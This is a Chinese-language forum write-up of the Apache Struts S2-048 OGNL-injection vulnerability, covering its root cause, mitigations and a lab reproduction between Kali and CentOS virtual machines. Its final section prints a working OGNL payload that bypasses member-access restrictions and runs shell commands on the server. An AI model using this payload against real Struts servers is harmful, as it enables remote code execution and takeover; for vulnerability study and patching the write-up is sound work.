一、漏洞分析

1. 漏洞背景:

  1. 官方说明:

    It is possible to perform a RCE attack with amalicious field value when using the Struts 2 Struts 1 plugin and it's a Struts1 action and the value is a part of a message presented to the user, i.e. whenusing untrusted input as a part of the error message in the ActionMessageclass.

  2. 详见:https://cwiki.apache.org/confluence/display/WW/S2-048 这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。

  3. 主要受影响的Struts版本为:2.3.x

  4. 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。

2. 漏洞原因

  1. showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java下,“Struts1.gangsterAdded”被引入:

  2. showcase/src/main/resources/globalMessages.properties下“Struts1.gangsterAdded”被定义. Struts1.gangsterAdded是一个关键值,一旦“Gangster{0} added successfully”,它将绕开执行OGNL代码。

  3. 这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了getText函数,这个函数会执行ognl表达式,更为严重的是getText的输入内容是攻击者可控的。

  4. 输入参数之后,执行Struts1ction的execute方法。

  5. 调用saveGangsterAction的excute方法,将表单中地内容封装到actionforward,这个方法中就带入有毒参数gforn.getName()放到了messages结构中,gform.getName()的值是从客户端获取的。

  6. 攻击者将用户可控地值添加到ActionMessage并在客户前端展示,导致其进入getText函数,最后messageb被当作ognl表达式执行。以下两部分代码事位于integration app下的SaveGangsterAction.java部分源码:

3.漏洞总结:

  1. 通过运行struts1Acion.java的execute方法,获取Action。

  2. 调用saveGangsterAction的execute方法,这部分代码就是漏洞代码,这里创建了一个action message变量,将表单请求封装到actionForm中。代码详见图2.6)

  3. 设置标识,获取ActionMessage。

  4. 回到Struts1Action.java,跟着代码流,我们能看到控制流到达getText方法在TextProviderSupport.java:红框所示的是在LocalizeTextUtil.Java中FindText的方法。这种方法负责找到本地message给key,它也能解析OGNL表达式。这个key就是aTextName,正如漏洞原因中提到的。

  5. 如果这种方法在提供地key中没有找到message,它就会调用getDefaultMessage地方法:

  6. translateVariables方法从OgnlTextPrasrt.java中调用parser.evaluate方法,Parser.evaluate函数事负责从message段中解析OGNL表达式的,它检查在message中的”${“或者”%{”字符串,创建var变量并且求它的值。这里就不截图了。

  7. 在Apache Struts中,大部分OGNL注入漏洞都被爆出来了。攻击者能够利用这些漏洞很容易就执行命令,因为OGNL注入漏洞比起其他攻击更简单。

  8. 漏洞防护:1)停用Struts2-struts1-plugin插件、showcase.war;2)讲直接传递原始值改为使用资源键:

二、宿主环境及攻击环境

这里,我开了两个虚拟机,kali做攻击机,Centos做靶机,以模拟RCE。

  1. 靶机:centOS 7.3:
  2. 攻击机:kali linux

三、EXP实现

1.搭建漏洞环境

  1. 下载漏洞环境包:http://archive.apache.org/dist/struts/2.3.24/struts-2.3.24-apps.zip

  2. 下载Tomcat:http://tomcat.apache.org/tomcat-7.0-doc/index.html

  3. 在Centos解压Tomcat包(这里我解压到用户目录下)

  4. 将下载好的漏洞环境包解压,将struts2-showcase.war,将移至解压后的Tomcat目录下的webapps下

  5. 开启Tomcat,执行命令:

2.本地验证漏洞

  1. 在终端打开Tomcat之后,在浏览器查看:127.0.0.1:8080,下图表示tomcat搭建成功:

  2. 访问漏洞环境:(如果无法访问,重启Tomcat将自动部署漏洞war包)
    http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action

  3. 验证漏洞环境
    i.输入表达式

    ii.Submit之后可看到运算被后台执行:

3.模拟RCE(远程代码执行)(确保Tomcat打开)

  1. Centos开启httpd、iptables、关闭防火墙、设置虚拟机NAT地址和端口。详见:
    http://blog.csdn.net/microsoft2014/article/details/57413491
    http://linux.it.net.cn/CentOS/fast/2015/0110/11567.html

  2. 确认Centos的IP:

  3. Kali访问Centos,执行OGNL语句:

  4. 访问:http://192.168.152.136:8080/struts2-showcase/integration/saveGangster.action

  5. Submit后:

4.POC使用

  1. 声明文件上传:

    %{(#szgx='multipart/form-data')

  2. 注入OGNL代码,通过ognl表达式静态调用获取ognl.OgnlContext的DEFAULT_MEMBER_ACCESS属性,并将获取地结果覆盖_memberAccess属性,绕过SecurityMemberAccess限制:

    (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm))))
  3. 判断服务器系统,调用cmd或bash:

    (#cmd='echo dota').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}

四、其他

1.复现过程中出现的问题及解决办法

  1. Tomcat安装的时候,一开始安装我装的事7.0.8x版本,在浏览器上进不了tomcat,后来使用低版本的,成功解决这个问题。

  2. 关闭、重置Centos防火墙的时候在终端下输入命令可能会出现一些问题,这些问题一般是因为没有安装一些软件如:iptables、httpd等,解决方法已在上述说明。

  3. 模拟远端登录的时候,一定要注意攻击机输入地IP为Centos服务器地址+端口号。

点击收藏 | 0 关注 | 0
追加 于 2017年12月29日 00:41

复现getshell的视频

复现视频.zip(1.835 MB) 下载附件

  • 动动手指,沙发就是你的了!
登录 后跟帖